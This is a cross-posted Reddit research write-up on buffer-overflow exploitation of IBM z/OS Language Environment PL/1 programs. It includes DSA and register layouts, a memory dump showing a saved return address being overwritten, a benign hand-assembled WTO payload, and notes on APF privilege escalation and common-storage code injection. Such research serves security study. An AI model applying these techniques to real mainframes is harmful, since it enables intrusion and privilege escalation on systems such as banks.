The following is a cross-post from REDDIT, reposted here with permission from the author @_Ciq (twitter) – Excellent write-up!!! -BeS
<Big wall of text trigger warning.>
Over the past few months I’ve been becoming increasingly interested in the CTF concept; finding (purposely built) flaws in software and exploiting them so that arbitrary code can be executed. Having an IBM mainframe background, I was wondering if a similar exercise could be made for that platform. Considering I only have access to a PL/1 compiler, I set out to see if its calling conventions can be exploited.
A typical security flaw for x86 systems consists of overflowing a buffer that lives on the stack, in order to overlay the piece of memory that contains the return address, which coincidentally also lives on the stack, to change the location that a subroutine will return back to. A good example of these are string buffer overflows, because the programmer carelessly copied a character array without properly checking the size of both.
Writing over this return address is trivial because a buffer will usually live close to said return address on the stack. This because of the x86 architecture revolving around a stack, and the common calling conventions used in x86 programs.
The Language Environment and its workings.
IBM mainframe programs written in compiled languages (COBOL, PL/1, C/C++, Java) are (since relatively recently) subject to being Language Environment (LE) compliant. Compilers will provide compliance automatically. The LE exists to provide a standardized calling convention, standardize tracing, and standardized debugging.
LE programs are, despite the z/Architecture not inherently being stack based, reliant on a stack structure. As a prologue to each procedure being executed, it will set up what is called a Dynamic Storage Area (DSA), which ties in with the calling conventions. It contains a couple of things;
- A pointer to the DSA of the procedure that called the current DSA’s procedure.
- A pointer to the DSA of the procedure that this DSA’s procedure called. (Optional, IBM compilers ignore this field.)
-  A save area where all registers are saved when the current DSA’s procedure calls another procedure.
-  A pointer to the next free byte on the stack. This gets set depending on how much storage the procedure needs for stack variables. It is used by any procedure called by this procedure to quickly determine where it can build its DSA.
And then some, but these things are the most important for us right now.
 z/Architecture has 16 general purpose registers. Unlike x86, they don’t have physically enforced functions. Everything is convention. The contents of registers can be important to a procedure. Hence upon calling another procedures, the contents of the registers must be saved.
There is no CALL assembler instruction in the z/Architecture. A call is compiled to a hard branch. There are several types of branches. A call to a procedure would typically be compiled to a branch with two operands. The register containing the address where to branch to, and the register in which to save the location of the instruction right after the current branch instruction, which serves as a return address for the called procedure (this is very important). There are two calling conventions in the mainframe world; caller saves and callee saves. In LE, the callee saves the registers of the caller, and it does this in the register save area that is in the caller’s DSA (third item in the list above). The caller will restore its register when the callee returns control to the caller.
For the sake of materializing this abstract explanation; upon a call-type branch, the address to return to will be saved in register 14.
In x86 calling conventions, the stack pointer grows higher and lower by POPing and PUSHing items to it. On z/Architecture, there is a register that is the stack pointer, but only by convention. No one is forcing anyone to use any register as a stack pointer. LE has chosen register 13 to be the stack pointer. You don’t push and pop items to the stack on z/Architecture. On a call, the LE sets the stack pointer (by checking where the next available stack byte is, which was determined at the start of the calling procedure), determines where the next stack frame should start (saved at ), and constructs its DSA at the currently set stack pointer. Your stack variables live right after the DSA and are accessed by addressing memory relative to the stack pointer. Typically when you compile a program, the listing will include the offsets of the variables to the beginning of the DSA for each procedure. Notice how this makes it annoying to dynamically allocate stack variables.
When setting up the DSA, a procedure (callee) will keep a pointer of the caller’s DSA, in its own (callee’s) DSA.
When a procedure wants to return to the procedure that called it, it needs an address to return to. As we discussed earlier, that address was originally saved in register 14 when the branch to the callee happened. The callee then proceeded to save all registers (including register 14) in the savearea set up in the caller’s DSA. The callee keeps a pointer to its caller’s DSA. So the callee can perfectly fetch the address it needs to return to. Take away from this that the return address lives on the stack, in proximity to stack variables.
How to exploit this?
On x86 architecture, string copies will compile to loops of byte moves. On z/Architecture, we can do this with one single assembler instruction; MVC. MVC takes the target location, a length, and a source location. Considering that strings are defined with a fixed length in mainframe programming languages (including PL/1), the compiler is aware of each string’s length at all times. As a result, if you try to assign a 10 byte string in to a 5 byte string, the compiler will do two things. Warn you that you’re doing something silly, and compile to an MVC instruction with length parameter 5, copying only the first half of the 10 byte string. As a result, exploiting string copies simply doesn’t work, because you can’t write exploitable code that way.
As a mainframe assembler programmer, I understood this fairly quickly. So I had to find another attack vector. In my limited research in to software vulnerability exploitation, I learned that a typical sign of having found a buffer overflow is when the application crashes. z/Architecture, and S/360 before it, rely heavily on ABENDs (abnormal ends). When an ABEND happens, it is accompanied by a code. One of the most common ABEND codes is S0C1. A S0C1 happens when the CPU is decoding an instruction, but finds that the OPCODE does not exist. Assuming that the IBM compilers are flawless, this almost always means that the program managed to branch to an area of memory containing data, and not instructions. For the times I was called up in the middle of the night to resolve a S0C1, it’s a welcome change that this is exactly what I wanted to happen for once.
So what programmer errors usually cause S0C1 ABENDs? Addressing an array with an index larger than it was allocated with. How does this happen? Same way x86 buffer overflows happen, no size checking.
Take a developer who knows that business rules dictate that no one can have more than 5 checking accounts. In a batch program that lists checking accounts, he has an array in which he loads the current person’s 5 checking accounts. He opens a cursor to the database, and starts fetching rows from the resultset, increasing an integer each time he writes a checking account to the array. Sometime, usually around 3:00 AM, the program will treat a person who somehow managed to open 6 checking accounts. The program tries to store the fetched row at an address that it shouldn’t, and sooner or later, the application breaks. S0C1.
Now that’s still pretty far from an exploit. But; we found that stack variables live close to return addresses on the stack, and we found that we can write to parts of the stack that we’re not supposed to write to. Good luck opening a 6th checking account which will meaningfully overlay a return address though, that’d be something.
Now, the LE stack grows upwards (unless forced through options in the LE parameters to do the opposite, which literally no one does, because why?). This is annoying! If we manage to write to an address higher than the highest address of an array, we’re just writing in to uninitialized stack space, that’s not helping us anything.
There is still an attack vector though; globally declared arrays. When a program gains control (we’ll call this level 0), it sets up its DSA as if it’s a procedure, and its stack variables go right above it. When a subroutine (level 1) is called from level 0, its DSA lives just above those globally declared stack variables. If we can get a globally declared array to write out of its bounds, it’ll eventually write in to level 1’s DSA.
Writing in to level 1’s DSA when we’re executing as level 1 doesn’t help us any though. The return address that level 1 returns to lives in the DSA of level 0 (register 14 containing the return address is saved in the caller’s DSA remember?), which lives under the globally declared variables. We can attack any level’s return address higher than level 0’s though. So if we can write out of bounds to a globally declared array from level 2 or higher, we’re golden. Note how a problem can arise as soon as more global variables live between the array we want to abuse, and the DSA we want to attack. If those are critical for a procedure to get to the point where it will return to its caller, it won’t, because they are destroyed when smashing the stack. Unless we put meaningful stuff in there, but this makes things much more complicated.
There is an exception to this. When you pass a pointer to an array (that lives somewhere between two level’s DSAs to a higher level procedure as an argument), you effectively extend the scope of that array to that procedure. This case is incredibly rare in the real world, I’d assume, since most PL/1 programmers I know don’t know about procedure arguments, and much less about pointers.
Working Proof of Concept.
So now to put this in practice.
We’re going to use a massively simple PL/1 program. Initially, I wanted to read a file line by line until it reached its end of file status, copying each line to a globally declared array, without bounds checking of course. When there are as many lines in the file as there are lines allocated for the array, we’re fine. But as soon as we add another, we’d be overwriting the DSA of the level 1 procedure. This doesn’t work, I know why (reading a file’s line is a call in itself), but not why (the read file call is a call to a closed source procedure, and I’m pretty sure it needs the complete DSA chain to be intact).
So what I do is I read all lines in to an array, then copy the elements of that array one by one in to an array with one element less allocated to it. I cheat twice in this PoC, this is the first. I’m working on a better concept with less cheating, of course.
From here on out it’s basically sitting through debugging sessions, learning offsets within the stack by comparing memory contents with listings, knowing the layout of the DSA, and knowing how a procedure gets its return address.
Turns out that in order to get a return address, a procedure will get its stack base + offset 0x04, which contains a pointer to its caller’s DSA, and then get that address + offset 0x0C, which is where register 14 (the return address, remember?) was saved during the callee’s prologue.
L r13,4(,r13) R13 is stack base, aka our DSA location. Load location of caller's DSA (our DSA + offset 4) in register 13.
L r14,12(,r13) R13 is now caller's stack base, aka its DSA location. At offset 12 to it, we find where register 14 was saved. We load this in to register 14.
LM r2,r6,28(r13) Restore all of the registers from the savearea.
BALR r1,r14 Return to the address in register 14, and store the address right after this instruction in register 1.
So we need to craft an overlay that will overwrite offset 0x0C in the DSA to change where the program will branch to when trying to return to that DSA’s procedure.
In our example, the stack looks something like this right before we write the 6th element to an array with 5 elements;
0 - 2 - 4 - 6 - 8 - A - C - E - = 0-2-4-6-8-A-C-E-
******************************** TOP OF DATA **********************************
192A6878 ===> A715000D 00160000 C7C8D6E2 E340C9D5 = x.......GHOST IN
192A6888 ===> 40E97DE2 40E2C8C5 D3D30A23 00000000 = Z'S SHELL......
192A6898 ===> 00000000 00000000 00000000 00000000 = ................
192A68A8 ===> 00000000 00000000 00000000 00000000 = ................
192A68B8 ===> 00000000 00000000 00000000 00000000 = ................
192A68C8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68D8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68E8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68F8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6908 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6918 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6928 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6938 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6948 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6958 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6968 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6978 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6988 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6998 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A69A8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A69B8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69C8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69D8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69E8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69F8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6A08 ===> 187C3150 192A65B8 188DD070 00044040 = .@.&......}...
192A6A18 ===> 0020A000 187C35A8 00000000 00000000 = .....@.y........
192A6A28 ===> 1929C95C 00048001 00606002 187C35B4 = ..I*.....--..@..
192A6A38 ===> 00000000 00000000 10000000 192A65B8 = ................
192A6A48 ===> 192A9B38 987C357A 187C31B8 00000080 = ....q@.:.@......
192A6A58 ===> 987C340E 192A6B18 187C358C 187C3AF4 = q@....,..@...@.4
192A6A68 ===> 192A65B8 187C3A70 187C35A8 18B937F0 = .....@...@.y...0
192A6A78 ===> 00000008 00000000 192A6230 18B94BD8 = ...............Q
192A6A88 ===> 00000000 192A6B88 18B0C5E0 18B93460 = ......,h..E\...-
192A6A98 ===> 00000000 192A6AC8 192A6AB4 192A62F4 = ......¦H..¦....4
192A6AA8 ===> 192A6AB8 9940A388 192A6C98 000015A0 = ..¦.r th..%q....
Address 192A6878 is the location of the first element in the array. It’s also our payload (more about that later). Each element is 80 bytes long, so element 2 starts at 192A68C8, etc etc. The 6th element (for which no allocation was made!) will be written to 192A6A08, which contains garbage. Between the end of the stack variables and the beginning of another DSA exists some padding, since the compiler aligns DSAs in a certain way. The DSA that lives right above this array is level 1’s DSA. It starts at address 192A6A40, I know this because I studied the offsets within a DSA (IBM documents) and the offsets of the stack variables to the stack frame base, which I get from the output listing when compiling the program (you don’t get this in real life). Offset 0x0C to the DSA base is the address that this DSA’s procedure has its callees return to.
Our payload will be 80 bytes long, because each element in the array is 80 bytes long. We get to inject our payload at 192A6A08, and the memory location we need to overlay is 192A6A4C. That’s at an offset of 68 (decimal), to the beginning of our payload. So our payload looks something like this in EBCDIC (yeah we don’t play with ASCII or UTF too well);
Hexadecimal it looks like this;
Notice how I put a valid (31 bit, it looks like 32 bits) address in the location that will be overlaid over the return address in the caller’s DSA. It’s 992A6878[*], the address of the first element of the array we’re attacking. I conveniently injected executable code on to the stack in this way. I could have put it in any element, including the 6th which overlays the return address. I could’ve also put it in common storage by using another program (z/Architecture memory layout feature), memory that is accessible by every address space.
* The address shown by the debugger is 192A6878, not 992A6878. The latter address has bit 0 flipped to 1, which indicates (in z/Architecture) that the program is running in 31 bit mode, which is the successor of the 24 bit mode before it. The debugger has problems with this, but the program is in fact running in 31 bit mode, and the address of the executable payload should have bit 0 flipped to 1.
This is also the second time I cheat by the way. I can’t easily find the address of our payload, it changes from execution to execution (more about this later). So to make it easy for myself, I print the address of the first element of the array to the spool, from the program itself, effectively telling me where I need to force the program to branch to. No program in the real world will do this for you!
So; this payload will make the program branch to our executable payload as soon as any procedure, no matter how many levels deep we are right now, tries to return to level 1.
So what’s in our payload?
x GHOST IN Z'S SHELL
It’s the machine code (hand)compiled from assembler instructions looking like this;
BRAS 1,<symbol> Branch relative to the current address, save address after this instruction in
register 1. We branch forwards 13 halfwords (0xD), or 26 bytes because our
parm list is that long.
DC AL2(6) Constant of 2 bytes, contents are integer '6'. Length of parameters.
DC B'0000000000000000' Constant of 2 bytes, contents binary zeroes. Parameters for SVC.
DC C'GHOST IN Z'S SHELL' Constant of 18 bytes, you know the contents. Message to display.
SVC 35 Make supervisor call 35.
Supervisor call 35 wants register 1 to contain a pointer to where its parameters are in memory. The parameters are in between the branch and the supervisor call. By branching over the parameters, straight to the SVC, and saving the address of the parameter list in register 1 by doing so, we accomplish a lot in just one instruction.
Supervisor call 35 is “Write To Operator”, or WTO. It writes a message to the consoles that are configured to display this particular message. It actually displays it so that’s fun.
This is arbitrary code being executed from an LE enabled program running under z/OS on a z/Architecture machine.
Random notes and thoughts.
z/Architecture does not feature executable space protection, nor does it have the possibility to mark memory as non-executable. This makes it very easy for us to inject code. As long as we can get it in memory, we can execute it.
z/Architecture does not feature ASLR, explicitly. The address at which the array in our PoC lives changes from time to time though. I’ve been doing some documentation digging (which is all I can do because IBM is closed source when it comes to code), and found that the stack is allocated at the start of an LE program with a GETMAIN SVC call (standard stuff). This triggers the Virtual Storage Manager to find an empty piece of memory with the size that was requested, with the characteristics requested. Why, and under what circumstances the VSM decides that another virtual page should be used this execution, as opposed to any other execution, I don’t know yet. I’m afraid I’ll have to reverse engineer parts of the GETMAIN SVC and VSM for that. Or go work for IBM?
z/Architecture features memory protection in the form of protection keys. You can only edit memory that has the same protection key as the address space you’re running it from. Protection keys run from 0-16 and are set when the address space is started. This protects userland programs from fucking up system areas that live in common storage. You cannot change the protection key of your address space*. When you allocate (virtual) memory, that memory is marked with the protection key of the address space that requested it.
z/Architecture features certain instructions that are protected. You can only run them when your program is compiled to be APF-authorized, and resides in an APF-authorized (z/OS option) library. Userland programs will never be APF authorized. APF authorization allows you to switch from problem state to supervisor state. Supervisor state allows you to change your protection key.
Since we’re probably only going to find vulnerabilities in userland programs, which aren’t (I hope in all shops) APF-authorized, we won’t be able to completely own the system. But we’ll be able to shit on a lot of stuff regardless.
If a vulnerability is found in an APF authorized program, some serious escalation can occur. This was part of the exploit-chain used by Warg to shit on Logica’s (Swedish bank) mainframes. An APF authorized program can create a new SVC. Warg introduced a new SVC which allowed any program to escalate its APF authorization (APF authorization is nothing but a bit in protection key 0 storage, which you can write to from an SVC since those run in key 0, supervisor mode). So any program you run, you can call that SVC and switch it to be APF authorized. This allowed him to hold control over the machine for a very long time, since this is seriously hard to find when you’re trying to protect the system.
Considering how simple the PoC is, I hope it’s clear that in order to be able to exploit a vulnerability, the planets really need to align. The vuln needs to exist, you need to somehow figure out how to craft the payload (hard if you’re not on the system, and have access to source code, compile listings, and a debugging session), and get the payload on the system. Then, when you have arbitrary code execution, you need to know how the system is set up to do interesting stuff. Open sockets, create files, edit files, delete files, what have you.
I mentioned earlier that it would be interesting to introduce the arbitrary code that we want to execute in to the common storage area, which is accessible by every address space. Address spaces are limited in what they can do based on authorities granted to the user they are started with by RACF. Authorities are for example; what files they have access to, what commands they can execute.
If you find a vulnerable program, but fail to inject enough code, you can use another program to inject it in to common storage, get a pointer to it, and then use that pointer as a target address for your exploit. Since the code being run from common storage would run in the address space of the vulnerable program, it’d be running under the user that the vulnerable program was started with. This is potential privilege escalation, as you get to do more stuff than you were originally allowed to do. Note that you first need to be able to log on to the system in order to inject anything in to common storage, which under normal circumstances you shouldn’t be allowed to.
So is it possible to “stack smash”, or “smash the daisy chain” (as I like to call it) of z/OS LE programs? Yes.
Will you be hard pressed to find a vulnerability? Yes.
Will you be even more hard pressed to somehow be allowed by business rules to inject something that is executable? Yes. My visa account number is sadly not executable machine code.
If you’re reading this because one of your managers is flipping out, I’m sorry.
I’m really new at this exploiting stuff, and probably missing a lot of easy things that could make the process of finding and abusing vulnerabilities a lot less complicated. If someone with more experience wants to get in to this, I’d be more than happy to help them get started, because I know I’ll get my return on investment when that person surpasses me and can teach me in return.
Link to original Reddit post